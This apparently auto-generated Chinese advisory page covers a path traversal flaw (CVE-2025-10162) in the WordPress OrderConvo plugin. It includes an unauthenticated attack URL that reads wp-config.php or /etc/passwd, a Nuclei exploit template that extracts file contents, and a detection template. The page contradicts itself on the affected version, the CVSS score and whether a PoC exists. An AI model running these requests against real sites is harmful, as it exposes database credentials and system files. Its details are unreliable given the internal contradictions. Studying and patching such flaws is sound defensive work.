[webapps] WordPress OrderConvo 14 - Path Traversal
WordPress OrderConvo插件(admin-and-client-message-after-order-for-woocommerce)版本13.5及以下存在路径遍历漏洞(CVE-2025-10162),未授权攻击者可通过REST API端点download-file读取服务器任意文件,导致敏感信息泄露,风险极高。
WordPress OrderConvo插件路径遍历漏洞,允许未授权读取任意文件。
High · CVSS 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)📋 漏洞基础信息
| CVE | CVE-2025-10162 |
|---|---|
| 漏洞类型 | 路径遍历 (Path Traversal) |
| 受影响版本 | WordPress OrderConvo插件 <= 13.5,具体功能为“admin-and-client-message-after-order-for-woocommerce” |
| 危害等级 | High · CVSS 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N) |
| 发布日期 | 2026-06-01 |
| 提交者 | Diamorphine |
| 来源 | Exploit-DB 原文 ↗ |
🔬 漏洞根因
漏洞位于REST API端点 `/wp-json/wooconvo/v1/download-file`,参数 `filename` 未进行路径过滤或规范化,直接拼接至文件读取操作,允许攻击者使用 `../` 序列跳出插件目录读取任意系统文件。
🎯 攻击场景
前提:目标站点安装并激活了受影响版本的OrderConvo插件,且WooCommerce REST API处于可用状态。攻击步骤: 1. 使用HTTP GET请求访问 `https://target/wp-json/wooconvo/v1/download-file?order_id=1&filename=../../../../wp-config.php`。 2. 服务器返回 `wp-config.php` 文件内容(或系统文件如 `/etc/passwd`)。 3. 成功读取配置文件,获取数据库凭据等敏感信息。
💥 漏洞影响
攻击者可在未授权情况下读取服务器任意文件(如wp-config.php获取数据库密码、系统敏感文件等),导致敏感信息泄露,进而可能引发服务器被完全控制。
⚔️ Nuclei Exploit 模板
以下为标准 Nuclei v3 格式的利用模板,可直接用于漏洞验证:
id: CVE-2025-10162-exploit
info:
name: WordPress OrderConvo <= 13.5 Path Traversal Exploit
author: Diamorphine
severity: high
description: WordPress OrderConvo plugin version 13.5 and potentially earlier versions are vulnerable to path traversal via the download-file endpoint, allowing an attacker to read arbitrary files.
reference:
- https://www.exploit-db.com/exploits/51000
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id: CVE-2025-10162
tags: wordpress,wp-plugin,path-traversal,woocommerce
variables:
filename: "../../../../wp-config.php"
http:
- method: GET
path:
- "{{BaseURL}}/wp-json/wooconvo/v1/download-file?order_id=1&filename={{filename}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<?php"
- "DB_NAME"
- "DB_USER"
- "DB_PASSWORD"
condition: or
- type: status
status:
- 200
extractors:
- type: kval
part: body
kval:
- body🔬 深度技术分析
PoC使用Python异步HTTP客户端: 1. 首先通过GET请求基本URL检查目标是否存活(状态码200)。 2. 构造恶意URL:`base_url + 'wp-json/wooconvo/v1/download-file?order_id=1&filename=' + file_path`,其中 `file_path` 默认为 `../../../../wp-config.php`。 3. 发送GET请求,若响应体非空则打印文件内容。 关键利用点:未对 `filename` 参数中的路径遍历序列 `../` 做任何过滤。
🔍 Nuclei Detection 模板
以下为漏洞探测模板,用于判断目标是否受影响:
id: CVE-2025-10162-detection
info:
name: WordPress OrderConvo <= 13.5 Path Traversal Detection
author: Diamorphine
severity: high
description: WordPress OrderConvo plugin version 13.5 and potentially earlier versions are vulnerable to path traversal via the download-file endpoint.
reference:
- https://www.exploit-db.com/exploits/51000
- https://wordpress.org/plugins/admin-and-client-message-after-order-for-woocommerce/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id: CVE-2025-10162
tags: wordpress,wp-plugin,path-traversal,woocommerce
http:
- method: GET
path:
- "{{BaseURL}}/wp-json/wooconvo/v1/download-file?order_id=1&filename=../../../../wp-config.php"
- "{{BaseURL}}/wp-json/wooconvo/v1/download-file?order_id=1&filename=test.txt"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DB_NAME"
- "DB_USER"
- "DB_PASSWORD"
- "DB_HOST"
condition: and
- type: status
status:
- 200🛡️ 修复建议
1. 升级OrderConvo插件至14.0或更高版本(厂商已发布修复)。 2. 临时缓解措施:在Web服务器(如Nginx/Apache)中配置规则,拒绝包含 `../` 的请求路径;或通过WordPress插件防火墙拦截包含路径遍历模式的REST API请求。
📎 参考链接
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-10162
- https://wordpress.org/plugins/admin-and-client-message-after-order-for-woocommerce/
- Exploit-DB 原文
🚨 威胁评估
| 📈 EPSS 利用概率 | 暂无数据 |
| 🚨 CISA KEV | 未被已知利用 |
| 🔧 公开 PoC | 暂无公开 PoC |
⚠️ 本文基于公开漏洞数据库,仅供安全研究与防御参考。生成时间: 2026-06-02 08:08 | 来源: Exploit-DB
🤖 常见问题解答(FAQ)
❓ 该漏洞是否需要认证?
不需要。从PoC看,仅需GET请求即可利用,属于未授权漏洞。
❓ 可否读取除wp-config外的文件?
可以。攻击者可指定任意文件路径,如/etc/passwd、/etc/shadow等。
❓ 受影响插件版本范围是多少?
原文标明版本13.5及以下受影响,修复版应为14.0。